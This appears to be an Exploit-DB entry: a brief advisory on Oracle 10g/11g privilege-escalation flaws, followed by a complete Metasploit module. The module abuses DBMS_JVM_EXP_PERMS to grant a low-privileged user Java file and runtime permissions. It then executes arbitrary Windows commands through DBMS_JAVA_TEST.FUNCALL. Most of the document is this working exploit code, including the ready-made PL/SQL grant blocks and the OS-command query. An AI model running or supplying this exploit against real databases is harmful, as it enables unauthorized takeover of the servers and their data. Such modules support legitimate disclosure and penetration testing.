Oracle 10g - Multiple Privilege Escalation Vulnerabilities

EDB-ID:

33600

CVE:

N/A




Platform:

Multiple

Date:

2010-02-05


source: https://www.securityfocus.com/bid/38115/info

Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages.

The attacker can exploit these issues to escalate their privileges to DBA or execute arbitrary operating system commands with SYSTEM privileges, leading to a complete compromise of an affected computer.

These vulnerabilities affect Oracle Database 11gR2. One of the issues also affects Oracle Database 10gR2. 

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::ORACLE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
			'Description'    => %q{
				This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
				any user with create session privilege to grant themselves java IO privileges.
				Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)

			},
			'Author'         => [ 'sid[at]notsosecure.com' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8822 $',
			'References'     =>
				[
					[ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
					[ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
				],
			'DisclosureDate' => 'Feb 1 2010'))

			register_options(
				[
					OptString.new('CMD', [ false, 'CMD to execute.',  "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
				], self.class)
	end

	def run
		name = Rex::Text.rand_text_alpha(rand(10) + 1)


		package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"

		package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"


		package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"



		os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual"

		begin
			print_status("Attempting to grant JAVA IO Privileges")
			prepare_exec(package1)
			prepare_exec(package2)
			prepare_exec(package3)
			print_status("Attempting to execute OS Code")
			prepare_exec(os_code)
		rescue => e
			print_status("Error: #{e.class} #{e}")
		end
	end

end